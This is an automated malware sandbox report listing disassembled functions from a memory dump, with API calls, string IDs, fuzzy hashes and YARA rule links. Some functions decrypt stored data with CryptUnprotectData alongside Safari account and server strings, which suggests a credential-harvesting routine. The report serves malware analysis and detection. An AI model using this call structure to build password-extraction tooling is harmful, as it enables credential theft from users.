                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                            • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                            • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                            • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                          • String ID:
                                          • API String ID: 3655998216-0
                                          • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                          • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                          • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                          • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                          Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 00445426
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                            • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                          • String ID:
                                          • API String ID: 1828521557-0
                                          • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                          • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                          • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                          • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                          Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                            • Part of subcall function 004062A6: SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                          • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ??2@FilePointermemcpy
                                          • String ID:
                                          • API String ID: 609303285-0
                                          • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                          • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                          • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                          • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                          Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _wcsicmp
                                          • String ID:
                                          • API String ID: 2081463915-0
                                          • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                          • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                          • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                          • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                          Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF), ref: 0040629C
                                            • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                          • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                            • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: File$CloseCreateErrorHandleLastRead
                                          • String ID:
                                          • API String ID: 2136311172-0
                                          • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                          • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                          • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                          • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                          Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ??2@??3@
                                          • String ID:
                                          • API String ID: 1936579350-0
                                          • Opcode ID: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                                          • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                          • Opcode Fuzzy Hash: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                                          • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                          Function 0040B633 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: free
                                          • String ID:
                                          • API String ID: 1294909896-0
                                          • Opcode ID: 003685cf356b02fbbab95fb8d76c74631070c0c773c27bafbcebbee0aa56b295
                                          • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                          • Opcode Fuzzy Hash: 003685cf356b02fbbab95fb8d76c74631070c0c773c27bafbcebbee0aa56b295
                                          • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                          Function 0040AA04 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: free
                                          • String ID:
                                          • API String ID: 1294909896-0
                                          • Opcode ID: 196381b9ffc9c4816d42631a332da68c1e878a4277d624e181b366dd14fec77a
                                          • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                          • Opcode Fuzzy Hash: 196381b9ffc9c4816d42631a332da68c1e878a4277d624e181b366dd14fec77a
                                          • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                          Function 00415304 Relevance: 1.3, APIs: 1, Instructions: 6COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: free
                                          • String ID:
                                          • API String ID: 1294909896-0
                                          • Opcode ID: 6cd4ef4cc40bf5a7540e7e9c88dd58f61d837874a50d1d7f714cafdae955675f
                                          • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                          • Opcode Fuzzy Hash: 6cd4ef4cc40bf5a7540e7e9c88dd58f61d837874a50d1d7f714cafdae955675f
                                          • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E

                                          Non-executed Functions

                                          Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • EmptyClipboard.USER32 ref: 004098EC
                                            • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                          • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                          • GlobalLock.KERNEL32(00000000), ref: 00409927
                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                          • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                          • GetLastError.KERNEL32 ref: 0040995D
                                          • CloseHandle.KERNEL32(?), ref: 00409969
                                          • GetLastError.KERNEL32 ref: 00409974
                                          • CloseClipboard.USER32 ref: 0040997D
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                          • String ID:
                                          • API String ID: 3604893535-0
                                          • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                          • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                          • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                          • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                          Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • EmptyClipboard.USER32 ref: 00409882
                                          • wcslen.MSVCRT ref: 0040988F
                                          • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                          • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                          • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                          • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                          • CloseClipboard.USER32 ref: 004098D7
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                          • String ID:
                                          • API String ID: 1213725291-0
                                          • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                          • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                          • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                          • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                          Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32 ref: 004182D7
                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                          • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                          • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                          • LocalFree.KERNEL32(?), ref: 00418342
                                          • free.MSVCRT ref: 00418370
                                            • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                            • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                          • String ID: OsError 0x%x (%u)
                                          • API String ID: 2360000266-2664311388
                                          • Opcode ID: 7a793c3aafbc7d353b0e578237d4b483da7e71834841705644cfc2f7eabd6d8e
                                          • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                          • Opcode Fuzzy Hash: 7a793c3aafbc7d353b0e578237d4b483da7e71834841705644cfc2f7eabd6d8e
                                          • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                          Function 0041739B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetVersionExW.KERNEL32(?), ref: 004173BE
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Version
                                          • String ID:
                                          • API String ID: 1889659487-0
                                          • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                          • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                          • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                          • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                          Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                          Download Yara Rule
                                          APIs
                                          • _wcsicmp.MSVCRT ref: 004022A6
                                          • _wcsicmp.MSVCRT ref: 004022D7
                                          • _wcsicmp.MSVCRT ref: 00402305
                                          • _wcsicmp.MSVCRT ref: 00402333
                                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                            • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                          • memset.MSVCRT ref: 0040265F
                                          • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                            • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                          • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                          • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _wcsicmp$Freememcpy$Library$CryptDataLocalUnprotectmemsetwcslen
                                          • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                          • API String ID: 2257402768-1134094380
                                          • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                          • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                          • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                          • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                          Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                          • String ID: :stringdata$ftp://$http://$https://
                                          • API String ID: 2787044678-1921111777
                                          • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                          • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                          • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                          • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                          Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                          • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                          • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                          • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                          • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                          • GetWindowRect.USER32(?,?), ref: 00414088
                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                          • GetDC.USER32 ref: 004140E3
                                          • wcslen.MSVCRT ref: 00414123
                                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                          • ReleaseDC.USER32(?,?), ref: 00414181
                                          • _snwprintf.MSVCRT ref: 00414244
                                          • SetWindowTextW.USER32(?,?), ref: 00414258
                                          • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                          • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                          • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                          • GetClientRect.USER32(?,?), ref: 004142E1
                                          • GetWindowRect.USER32(?,?), ref: 004142EB
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                          • GetClientRect.USER32(?,?), ref: 0041433B
                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                          • String ID: %s:$EDIT$STATIC
                                          • API String ID: 2080319088-3046471546
                                          • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                          • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                          • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                          • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                          Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • EndDialog.USER32(?,?), ref: 00413221
                                          • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                          • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                          • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                          • memset.MSVCRT ref: 00413292
                                          • memset.MSVCRT ref: 004132B4
                                          • memset.MSVCRT ref: 004132CD
                                          • memset.MSVCRT ref: 004132E1
                                          • memset.MSVCRT ref: 004132FB
                                          • memset.MSVCRT ref: 00413310
                                          • GetCurrentProcess.KERNEL32 ref: 00413318
                                          • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                          • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                          • memset.MSVCRT ref: 004133C0
                                          • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                          • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                          • wcscpy.MSVCRT ref: 0041341F
                                          • _snwprintf.MSVCRT ref: 0041348E
                                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                          • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                          • SetFocus.USER32(00000000), ref: 004134B7
                                          Strings
                                          • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                          • {Unknown}, xrefs: 004132A6
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                          • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                          • API String ID: 4111938811-1819279800
                                          • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                          • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                          • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                          • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                          Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                          • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                          • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                          • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                          • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                          • SetCursor.USER32(00000000), ref: 0040129E
                                          • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                          • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                          • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                          • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                          • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                          • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                          • EndDialog.USER32(?,?), ref: 0040135E
                                          • DeleteObject.GDI32(?), ref: 0040136A
                                          • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                          • ShowWindow.USER32(00000000), ref: 00401398
                                          • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                          • ShowWindow.USER32(00000000), ref: 004013A7
                                          • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                          • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                          • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                          • String ID:
                                          • API String ID: 829165378-0
                                          • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                          • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                          • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                          • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                          Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 00404172
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                          • wcscpy.MSVCRT ref: 004041D6
                                          • wcscpy.MSVCRT ref: 004041E7
                                          • memset.MSVCRT ref: 00404200
                                          • memset.MSVCRT ref: 00404215
                                          • _snwprintf.MSVCRT ref: 0040422F
